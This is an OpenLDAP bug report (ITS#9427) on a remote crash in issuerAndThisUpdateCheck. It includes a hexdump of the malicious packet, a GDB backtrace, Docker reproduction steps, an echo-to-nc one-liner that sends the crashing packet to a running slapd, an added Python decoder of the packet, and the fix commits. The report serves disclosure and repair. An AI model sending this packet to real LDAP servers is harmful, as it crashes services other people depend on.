A malicious packet causes an integer underflow resulting in a crash, similar to ITS#9404 and ITS#9424. Applicable to both 2.4.56 and the devel branch.

Packet:

00000000: 3082 0157 0201 3063 8201 3030 0030 0030  0..W..0c..00.0.0
00000010: 0030 0030 0030 0230 3030 0030 00a0 8201  .0.0.0.000.0....
00000020: 3030 3030 1d31 2e32 2e38 3236 2e30 2e31  0000.1.2.826.0.1
00000030: 2e33 3334 3438 3130 2e32 2e33 0030 3030  .3344810.2.3.000
00000040: 3030 0482 0100 307f 3030 3030 3030 3030  00....0.00000000
00000050: 3030 3030 3030 3030 3030 3030 3030 3030  0000000000000000
00000060: 3030 3030 3030 3030 3030 3030 3030 3030  0000000000000000
00000070: 3030 3030 3030 3030 3030 3030 3030 3030  0000000000000000
00000080: 3030 3030 3030 3030 3030 3030 3030 3030  0000000000000000
00000090: 3030 3030 3030 3030 3030 3030 3030 3030  0000000000000000
000000a0: 3030 3030 3030 3030 3030 3030 300d 3030  0000000000000.00
000000b0: 3030 3030 3030 3030 3030 30a9 3081 0932  00000000000.0..2
000000c0: 2e35 2e31 332e 3338 8382 0040 7b20 2069  .5.13.38...@{  i
000000d0: 7373 7565 7220 2020 2020 2020 2020 2020  ssuer           
000000e0: 2020 2020 2020 2020 2020 2020 2020 2020                  
000000f0: 2020 2020 2020 2020 2020 2020 2020 2072                 r
00000100: 646e 5365 7175 656e 6365 3a22 3030 3030  dnSequence:"0000
00000110: 3030 3030 3030 3030 3030 3030 3030 3030  0000000000000000
00000120: 3030 3030 3030 3030 3030 3030 3030 3030  0000000000000000
00000130: 3030 3030 3030 3030 3030 3030 3030 3030  0000000000000000
00000140: 3030 3030 3030 3030 3030 3030 3030 3030  0000000000000000
00000150: 3030 3030 3030 3030 3030 30               00000000000

GDB output:

Program received signal SIGSEGV, Segmentation fault.
0x00005555555e5d5f in issuerAndThisUpdateCheck (in=0x7fffffffd0c0, is=0x7fffffffcf90, tu=0x7fffffffcfa0, ctx=0x5555559a1790) at schema_init.c:3932
3932        if ( is->bv_val[is->bv_len] != '"' ) {
(gdb) bt
#0  0x00005555555e5d5f in issuerAndThisUpdateCheck (in=0x7fffffffd0c0, is=0x7fffffffcf90, tu=0x7fffffffcfa0, ctx=0x5555559a1790) at schema_init.c:3932
#1  0x00005555555e63a3 in issuerAndThisUpdatePretty (syntax=0x5555557fa700, in=0x7fffffffd0c0, out=0x7fffffffd030, ctx=0x5555559a1790) at schema_init.c:4084
#2  0x00005555555b9395 in asserted_value_validate_normalize (ad=0x0, mr=0x5555557ffdf0, usage=2049, in=0x7fffffffd0c0, out=0x7fffffffd0e8, text=0x7fffffffe490, ctx=0x5555559a1790) at value.c:153
#3  0x0000555555606f76 in get_mra (op=0x5555559a1360, ber=0x555555aa1830, f=0x7fffffffd190, text=0x7fffffffe490) at mra.c:198
#4  0x0000555555598f8a in get_simple_vrFilter (op=0x5555559a1360, ber=0x555555aa1830, filt=0x5555559a18c0, text=0x7fffffffe490) at filter.c:1077
#5  0x0000555555599242 in get_vrFilter (op=0x5555559a1360, ber=0x555555aa1830, vrf=0x5555559a1648, text=0x7fffffffe490) at filter.c:1169
#6  0x00005555555d5d45 in parseValuesReturnFilter (op=0x5555559a1360, rs=0x7fffffffe470, ctrl=0x5555559a1848) at controls.c:1618
#7  0x00005555555d3bab in slap_parse_ctrl (op=0x5555559a1360, rs=0x7fffffffe470, control=0x5555559a1848, text=0x7fffffffe490) at controls.c:737
#8  0x00005555555d437f in get_ctrls2 (op=0x5555559a1360, rs=0x7fffffffe470, sendres=1, ctag=160) at controls.c:928
#9  0x00005555555d3c72 in get_ctrls (op=0x5555559a1360, rs=0x7fffffffe470, sendres=1) at controls.c:767
#10 0x0000555555594c9c in do_search (op=0x5555559a1360, rs=0x7fffffffe470) at search.c:195
#11 0x0000555555591cc0 in connection_operation (ctx=0x5555557f4280 <ldap_int_main_thrctx>, arg_v=0x5555559a1360) at connection.c:1163
#12 0x00005555555923e9 in connection_read_thread (ctx=0x5555557f4280 <ldap_int_main_thrctx>, argv=0xa) at connection.c:1318
#13 0x0000555555565c9b in main (argc=1, argv=0x7fffffffe6b8) at fuzzing.c:100

Testing:

1. Launch openldap
   (Current public repo)  docker run -it --net=host bitnami/openldap
   (More recent develop)  docker run -it --net=host phasip/openldap

2. Send crashing packet
   echo -en '\x30\x82\x01\x57\x02\x01\x30\x63\x82\x01\x30\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x02\x30\x30\x30\x00\x30\x00\xa0\x82\x01\x30\x30\x30\x30\x1d\x31\x2e\x32\x2e\x38\x32\x36\x2e\x30\x2e\x31\x2e\x33\x33\x34\x34\x38\x31\x30\x2e\x32\x2e\x33\x00\x30\x30\x30\x30\x30\x04\x82\x01\x00\x30\x7f\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x0d\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\xa9\x30\x81\x09\x32\x2e\x35\x2e\x31\x33\x2e\x33\x38\x83\x82\x00\x40\x7b\x20\x20\x69\x73\x73\x75\x65\x72\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x6e\x53\x65\x71\x75\x65\x6e\x63\x65\x3a\x22\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30' | nc localhost 1389
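Added illustration, not part of this report or of OpenLDAP's code: the Python below walks the crashing packet with a small BER reader along the path the backtrace shows (do_search, get_ctrls, parseValuesReturnFilter, get_mra) and pulls out what reaches issuerAndThisUpdateCheck. That turns out to be a matchedValues control (OID 1.2.826.0.1.3344810.2.3, RFC 3876) carrying an extensibleMatch whose matching rule is 2.5.13.38 (certificateListExactMatch, RFC 4523) and whose 64-byte assertion opens a quoted rdnSequence and never closes it. The reader deliberately does not hold nested elements to their declared lengths, because several lengths in this packet disagree with their contents and the backtrace shows slapd still reaches the assertion syntax checker. The packet bytes are transcribed from the hexdump above; the tag constants and helper names are the example's own.

```python
"""Walk the ITS#9427 crash packet far enough to see the assertion value that
reaches issuerAndThisUpdateCheck.  Added example; not OpenLDAP code."""

# BER / LDAP tags used on the walk (X.690, RFC 4511, RFC 4511 sec. 4.5.1.7.7).
TAG_SEQUENCE = 0x30
TAG_SEARCH_REQUEST = 0x63      # [APPLICATION 3]
TAG_CONTROLS = 0xA0            # [0] Controls
TAG_EXTENSIBLE_MATCH = 0xA9    # [9] MatchingRuleAssertion
TAG_MRA_RULE = 0x81            # [1] matchingRule
TAG_MRA_VALUE = 0x83           # [3] matchValue

# Transcribed from the hexdump in the report, one literal per 16-byte row.
CRASH_PACKET = bytes.fromhex(
    "3082 0157 0201 3063 8201 3030 0030 0030"   # 0x000
    "0030 0030 0030 0230 3030 0030 00a0 8201"   # 0x010
    "3030 3030 1d31 2e32 2e38 3236 2e30 2e31"   # 0x020
    "2e33 3334 3438 3130 2e32 2e33 0030 3030"   # 0x030
    "3030 0482 0100 307f 3030 3030 3030 3030"   # 0x040
    + "30" * 80                                  # 0x050-0x09f: five rows of '0'
    + "3030 3030 3030 3030 3030 3030 300d 3030"  # 0x0a0
    "3030 3030 3030 3030 3030 30a9 3081 0932"   # 0x0b0
    "2e35 2e31 332e 3338 8382 0040 7b20 2069"   # 0x0c0
    "7373 7565 7220 2020 2020 2020 2020 2020"   # 0x0d0
    "2020 2020 2020 2020 2020 2020 2020 2020"   # 0x0e0
    "2020 2020 2020 2020 2020 2020 2020 2072"   # 0x0f0
    "646e 5365 7175 656e 6365 3a22 3030 3030"   # 0x100
    + "30" * 64                                  # 0x110-0x14f: four rows of '0'
    + "3030 3030 3030 3030 3030 30"              # 0x150: last 11 bytes
)


def read_header(buf, pos):
    """Parse the tag and short- or long-form length at buf[pos].
    Returns (tag, length, position of the first content byte)."""
    tag = buf[pos]
    first = buf[pos + 1]
    pos += 2
    if first & 0x80:
        nbytes = first & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    else:
        length = first
    return tag, length, pos


def read_tlv(buf, pos):
    """Read one whole element.  The only bound enforced is the end of buf."""
    tag, length, pos = read_header(buf, pos)
    end = pos + length
    if end > len(buf):
        raise ValueError(f"element at {pos} declares {length} bytes, "
                         f"only {len(buf) - pos} remain")
    return tag, buf[pos:end], end


def enter(buf, pos, expect):
    """Step into a constructed element without binding the walk to its
    declared length (lengths here disagree with their contents)."""
    tag, _, pos = read_header(buf, pos)
    if tag != expect:
        raise ValueError(f"expected tag 0x{expect:02x}, got 0x{tag:02x}")
    return pos


def extract_assertion(pkt):
    """LDAPMessage -> SearchRequest -> controls -> Control -> controlValue
    -> ValuesReturnFilter -> extensibleMatch; return its rule and value."""
    pos = enter(pkt, 0, TAG_SEQUENCE)                  # LDAPMessage
    _, msgid, pos = read_tlv(pkt, pos)                 # messageID
    pos = enter(pkt, pos, TAG_SEARCH_REQUEST)
    # baseObject, scope, derefAliases, sizeLimit, timeLimit, typesOnly,
    # filter, attributes: the fuzzer tagged them all 0x30, so skip by count.
    for _ in range(8):
        _, _, pos = read_tlv(pkt, pos)
    pos = enter(pkt, pos, TAG_CONTROLS)
    pos = enter(pkt, pos, TAG_SEQUENCE)                # Control
    _, ctype, pos = read_tlv(pkt, pos)                 # controlType
    _, cvalue, pos = read_tlv(pkt, pos)                # controlValue
    # controlType carries a NUL plus padding after the OID; a C-string
    # comparison only sees the part before the NUL.
    control_oid = ctype.split(b"\0", 1)[0].decode("ascii")

    pos = enter(cvalue, 0, TAG_SEQUENCE)               # ValuesReturnFilter
    while pos < len(cvalue):
        if cvalue[pos] != TAG_EXTENSIBLE_MATCH:
            _, _, pos = read_tlv(cvalue, pos)          # unknown item, skipped
            continue
        pos = enter(cvalue, pos, TAG_EXTENSIBLE_MATCH)
        tag, rule, pos = read_tlv(cvalue, pos)
        if tag != TAG_MRA_RULE:
            raise ValueError("extensibleMatch without matchingRule")
        tag, value, pos = read_tlv(cvalue, pos)
        if tag != TAG_MRA_VALUE:
            raise ValueError("extensibleMatch without matchValue")
        return {"message_id": int.from_bytes(msgid, "big"),
                "control_oid": control_oid,
                "matching_rule": rule.decode("ascii"),
                "assertion": value}
    raise ValueError("no extensibleMatch in the ValuesReturnFilter")


def issuer_quote_unterminated(assertion):
    """True when the issuer's rdnSequence opens a quoted string that the
    assertion never closes, which is the shape of the value in this report."""
    _, sep, rest = assertion.partition(b'rdnSequence:"')
    return bool(sep) and b'"' not in rest


if __name__ == "__main__":
    info = extract_assertion(CRASH_PACKET)
    for key, val in info.items():
        print(f"{key}: {val!r}")
    print("issuer quote unterminated:", issuer_quote_unterminated(info["assertion"]))
```

Run stand-alone it prints the assertion as `{  issuer` followed by 42 spaces and `rdnSequence:"`, with nothing after the opening quote. The comparison at schema_init.c:3932 in the backtrace is a search for the closing double quote, and this value has none, so the scan has only the bytes past the end of the 64-byte value to look at.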
fixed in master
trunk: Commits: • 27428b96 by Howard Chu at 2020-12-16T18:52:42+00:00 ITS#9427 fix issuerAndThisUpdateCheck
RE24: Commits: • 91dccd25 by Howard Chu at 2020-12-16T18:56:45+00:00 ITS#9427 fix issuerAndThisUpdateCheck